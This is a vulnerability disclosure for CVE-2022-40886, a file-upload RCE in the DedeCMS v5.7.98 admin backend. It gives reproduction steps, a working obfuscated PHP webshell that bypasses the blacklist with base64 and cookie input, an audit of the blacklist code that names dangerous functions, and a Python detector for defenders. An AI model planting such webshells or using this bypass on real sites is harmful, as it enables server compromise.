CVE-2022-40886: Vulnerability/DedeCMS-v5.7.98-RCE.md at master · Ephemeral1y/Vulnerability
DedeCMS 5.7.98 has a file upload vulnerability in the administrative backend.
DedeCMS v5.7.98 RCE
DedeCMS official website: https://www.dedecms.com/download
Vulnerability Description
DedeCMS v5.7.98 has a file upload function in the administrative backend. The upload filter is a blacklist, so a file containing malicious code written to evade that blacklist is accepted and leads to remote code execution (RCE).
Affected product: DedeCMS V5.7.98
Attack type: Remote
Affected component: /dede/file_manage_control.php
Recurrence Process
Visit /dede and log in to the website backend.
Upload the file below.
shell.php

```php
<?php $a = "Y3JlYXRlX2Z1bmN0aW9u"; $b = base64_decode($a); $c = $_COOKIE['hello'] . ';'; $b('', $c)();
```

The upload succeeds.
Visit shell.php to reach the webshell.
Code Audit
In /dede/file_manage_control.php, the uploaded file is checked by uploadsafe.inc.php:

```php
if (file_exists($$_key)) {
    $fp = fopen($$_key, 'rb');
    $content = fread($fp, ${$_key . '_size'});
    fclose($fp);
    global $cfg_disable_funs;
    // Default blacklist of function names; can be overridden by the configuration.
    $cfg_disable_funs = isset($cfg_disable_funs) ? $cfg_disable_funs : 'phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,preg_replace';
    // Note: 'array_filert' is spelled this way in the DedeCMS source.
    $cfg_disable_funs = $cfg_disable_funs.',_GET,_POST,_REQUEST,include,create_function,array_map,call_user_func,call_user_func_array,array_filert';
    foreach (explode(",", $cfg_disable_funs) as $value) {
        $value = str_replace(" ", "", $value);
        // Reject the file if a blacklisted name appears followed by '(' or '['.
        if(!empty($value) && preg_match("#[^a-z]+['\"]*{$value}['\"]*[\s]*[([]#i", " {$content}") == TRUE) {
            $content = dede_htmlspecialchars($content);
            die("DedeCMS提示:当前上传的文件中存在恶意代码!<pre>{$content}</pre>");
        }
        // Reject <script src="..."> references to hosts other than $cfg_basehost.
        if(!empty($value) && preg_match("#(<)[\s]*(script)[\s\S]*(src)[\s]*(=)[\s]*[\"|']#i", " {$content}") == TRUE) {
            preg_match_all("#(src)[\s]*(=)[\s]*[\"|'][\s]*((http|https)(:\/\/)[\S]*)[\"|']#i", " {$content}", $subject);
            foreach ($subject[3] as $url) {
                if (preg_match("#^(http|https):\/\/#i", $url) && !preg_match("#^{$cfg_basehost}#", $url)) {
                    die("DedeCMS提示:非本站资源无法访问!<pre>{$url}</pre>");
                }
            }
        }
    }
}
```
`$cfg_disable_funs` defines a blacklist. When a string in the file content matches an entry of the blacklist, the upload is blocked. Because the check is a plain string match, it can be bypassed by encoding the name.
`create_function` is a PHP function that creates an anonymous (lambda-style) function. It is in the blacklist, but its base64-encoded name can be assigned to a variable and the function then called through that variable, so the literal name never appears in the file.
`_GET`, `_POST` and `_REQUEST` are in the blacklist, but `_COOKIE` is not, so input can be taken from a cookie instead.
Combining the two gives the final payload.
In addition, the function blacklist itself can be edited in the backend, which is another way to obtain a shell.
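Added here as a defender's example (not part of the original writeup or of the DedeCMS code base): a Python port of the blacklist regex above, run over the sample upload, next to a stricter check that also decodes base64 string literals and flags superglobal input and variable function calls. The sample string and the hardened rules are constructed for this example.

```python
import base64
import re

# Constructed sample mirroring the upload discussed on the page.
SAMPLE_UPLOAD = (
    '<?php $a = "Y3JlYXRlX2Z1bmN0aW9u"; $b = base64_decode($a); '
    '$c = $_COOKIE[\'hello\'] . \';\'; $b(\'\', $c)();'
)

# Blacklist as built in uploadsafe.inc.php (including the array_filert spelling).
DISABLED_FUNS = (
    "phpinfo,eval,assert,exec,passthru,shell_exec,system,proc_open,popen,curl_exec,"
    "curl_multi_exec,parse_ini_file,show_source,file_put_contents,fsockopen,fopen,fwrite,"
    "preg_replace,_GET,_POST,_REQUEST,include,create_function,array_map,call_user_func,"
    "call_user_func_array,array_filert"
).split(",")


def dedecms_blacklist_hits(content: str) -> list[str]:
    """Port of the original check: a blacklisted name followed by '(' or '['."""
    hits = []
    for name in DISABLED_FUNS:
        pattern = r"[^a-z]+['\"]*" + re.escape(name) + r"['\"]*\s*[(\[]"
        if re.search(pattern, " " + content, re.IGNORECASE):
            hits.append(name)
    return hits


def hardened_hits(content: str) -> list[str]:
    """Stricter check (constructed): decode base64 literals, flag superglobals and $var() calls."""
    findings = set(dedecms_blacklist_hits(content))
    lowered = {n.lower() for n in DISABLED_FUNS}
    # Any quoted base64-looking literal is decoded and compared against the blacklist.
    for literal in re.findall(r"['\"]([A-Za-z0-9+/]{8,}={0,2})['\"]", content):
        try:
            decoded = base64.b64decode(literal, validate=True).decode("ascii")
        except (ValueError, UnicodeDecodeError):
            continue
        if decoded.lower() in lowered:
            findings.add(f"base64:{decoded}")
    # Input sources the original list does not cover.
    if re.search(r"\$_(COOKIE|SERVER|FILES|ENV|SESSION)\b", content):
        findings.add("superglobal-input")
    # Calling a function through a variable hides the callee's name from any string match.
    if re.search(r"\$\w+\s*\(", content):
        findings.add("variable-function-call")
    return sorted(findings)
```

The original check returns no hits for the sample, while the hardened check reports the decoded function name, the cookie input and the variable call; an allow-list of permitted file types remains the more robust control than any content blacklist.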
Related news
An arbitrary file upload vulnerability in the component /dede/file_manage_control.php of Dedecms v5.7.101 allows attackers to execute arbitrary code via a crafted PHP file. This vulnerability is related to an incomplete fix for CVE-2022-40886.